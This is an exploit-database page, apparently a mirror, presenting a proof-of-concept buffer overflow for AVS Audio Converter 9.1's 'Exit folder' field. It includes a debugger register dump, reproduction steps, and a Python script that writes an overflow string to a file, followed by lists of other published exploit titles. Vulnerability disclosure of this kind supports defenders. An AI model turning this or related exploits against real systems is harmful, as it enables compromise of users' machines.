Search for hundreds of thousands of exploits

"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow"

Author

Exploit author

ZwX

Platform

Exploit platform

windows

Release date

Exploit published date

2019-12-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.avs4you.com/
# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
# Tested on OS: Windows 7

'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter. 
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. 
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. 
The vulnerability is marked as classic buffer overflow issue.


Analyze Registers:
==================
(1e74.1b78): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
42424242 ??              ???
0:000> !exchain
0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
0012fa30: 42424242
Invalid exception stack at 41414141


Note: EIP & ECX  overwritten


Proof of Concept (PoC):
=======================
1.Download and install AVS Audio Converter
2.Open the AVS Audio Converter 
3.Run the python operating script that will create a file (poc.txt)
4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder"
5.Click on browse
6.EIP overwritten
'''

#!/usr/bin/python

buffer = "\x41" * 264
a = "\x42" * 4
b = "\x43" * 1000

poc = buffer + a + b 
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-09-29 "BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)" local windows "Christian Vierschilling"
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
2020-09-14 "Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path" local windows Jok3r
Release Date Title Type Platform Author
2020-02-12 "MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow" local windows ZwX
2020-02-12 "MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow" local windows ZwX
2020-02-11 "Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow" local windows ZwX
2020-02-11 "DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow" local windows ZwX
2020-02-10 "Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow" local windows ZwX
2020-02-06 "ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path" local windows ZwX
2020-01-13 "Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions" local windows ZwX
2020-01-09 "MSN Password Recovery 1.30 - XML External Entity Injection" local xml ZwX
2020-01-09 "ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)" dos windows ZwX
2020-01-06 "Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path" local windows ZwX
2019-12-18 "XnView 2.49.1 - 'Research' Denial of Service (PoC)" dos windows ZwX
2019-12-18 "AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow" local windows ZwX
2019-12-05 "Amiti Antivirus 25.0.640 - Unquoted Service Path" local windows ZwX
2019-12-05 "NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path" local windows ZwX
2019-12-04 "Microsoft Visual Basic 2010 Express - XML External Entity Injection" local xml ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Key' Denial of Service" dos windows ZwX
2019-11-29 "SpotAuditor 5.3.2 - 'Name' Denial of Service" dos windows ZwX
2019-11-27 "Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)" dos windows ZwX
2019-11-27 "SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)" dos windows ZwX
2019-11-22 "LiteManager 4.5.0 - Insecure File Permissions" local windows ZwX
2019-11-22 "ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path" local windows ZwX
2019-11-19 "XMedia Recode 3.4.8.6 - '.m3u' Denial Of Service" dos windows ZwX
2019-11-19 "BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path" local windows ZwX
2019-11-18 "MobileGo 8.5.0 - Insecure File Permissions" local windows ZwX
2018-09-13 "Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)" dos windows_x86 ZwX
2018-09-13 "Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow" local windows ZwX
2018-08-29 "R 3.4.4 - Buffer Overflow (SEH)" local windows ZwX
2016-12-16 "WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection" webapps php ZwX
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/47788/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.